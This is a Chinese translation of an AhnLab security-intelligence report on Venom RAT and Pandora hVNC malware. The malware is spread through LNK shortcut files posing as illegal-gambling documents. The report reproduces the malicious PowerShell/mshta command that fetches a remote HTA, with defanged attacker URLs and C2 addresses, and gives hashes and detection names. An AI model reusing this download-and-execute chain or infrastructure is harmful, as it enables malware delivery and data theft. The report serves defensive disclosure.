攻击者通过赌博网站传播多个RAT

AhnLab 安全情报中心 (ASEC) 证实，RAT 恶意软件正在伪装成非法赌博相关文件进行传播。与上个月发布的 VenomRAT 分发方法相同，它通过快捷方式（.lnk）文件进行分发，并直接从 HTA 下载 RAT 恶意软件。

图1 操作流程

确认分发的快捷方式文件包含恶意Powershell命令，并运行MSHTA下载恶意脚本。

Powershell 命令

C:WindowsSystem32WindowsPowerShellv1.0powershell.exe。$env:C:W*S*2m*h?a.* 'hxxp://193.***.***[.]253:7287/2.hta.hta'

图 2. LNK 属性

已确认的快捷方式文件中包含的恶意URL如下。

hxxp://193.***.***[.]253:7287/2.hta.hta
hxxp://193.***.***[.]253:7287/.hta
hxxp://85.209.176[.]158:7287/6.hta

VBS 代码和以前一样存在于 hxxp://193.***.***[.]253:7287/2.hta.hta 中。在 VBS 代码内部，普通文档文件和下载 RAT 恶意软件的 Powershell 命令都被混淆了。解码后的PowerShell命令如下。

图 3. 解码后的 Powershell 命令

当执行[图3]中的Powershell命令时，它会从hxxp://193.***.***[.]253:7287/percent.xlsm下载Excel文档并将其保存在%APPDATA%文件夹中文件名为%.xlsm。保存。下载的Excel文档（percent.xlsm）的文本中，写着投注相关的方法，如图4所示，可见正在分发给相关用户。

图 4.percent.xlsm 正文内容

然后，从 hxxp://193.***.***[.]253:7287/darkss.exe 下载附加可执行文件，并将其保存为 %APPDATA% 文件夹中的 darkss.exe。下载的可执行文件是一个 Venom RAT 恶意软件，它不仅会泄露键盘记录和用户信息，而且还可以通过接收攻击者的命令来执行各种恶意操作。

图 5. Darkss.exe (Venom RAT) 代码片段

C2：193.***.***[.]253:4449

此前确认的URL（193.***.***[.]253:7287、85.209.176[.]158:7287）除了恶意代码外，还包含各种恶意HTA脚本、诱饵文档文件和恶意可执行文件。文中描述的文件。这个存在。

图 6. 恶意 URL 中识别出的其他文件列表。

此外，已确认的诱饵文件还包含与赌博网站相关的信息，并包括一些用户的个人信息。

图 7. 其他已确认的诱饵文档 1 (2023_12.xlsx)

图 8. 其他已确认的诱饵文档 2 (testDB.xlsx)

【图6】中识别出的恶意可执行文件Darksoft111.exe和Pandora_cryptered.exe分别是Venom RAT和Pandora hVNC恶意软件，攻击者使用的RAT恶意软件类型多种多样，用户需要特别小心。

图 9. Pandora_cryptered.exe (Pandora hVNC) 代码片段

【文件诊断】

Downloader/LNK.Generic.S2541(2024.01.25.02)
Downloader/HTA.Agent (2024.01.29.03)
Trojan/Win.PWSX-gen (2024.01.12.03)
Trojan/Win.Krypt (2024.01.29.03)

【行为诊断】

Execution/MDP.Powershell.M2514

[IOC]

MD5

ac281f9830ee7f0a142cecc76fe59da9 (LNK)
20a88382040e47209e50652599d92440 (LNK)
cfe22644d656ca2fbdc44aaecb37fab9 (LNK)
15e98eb4a6fd73ff10cac751d467375e (HTA)
97e5b88cf1a452393c790ff84f08e3be (HTA)
9aa64f465c28e4d9af91af2fe2d29e5e (HTA)
04dc064b9e6fbc1466f5844c2dd422a4 (EXE)
a69f529f5fa414aba6af1f063ec7ce32 (EXE)
0bb437212ee1af602f7a34670825ff43 (EXE)

URL

hxxp://85.209.176[.]158:7287
85.209.176[.]158:1337
85.209.176[.]158:4449

参考链接： https://asec.ahnlab.com/ko/61250/

图片来源网络目标可联系删除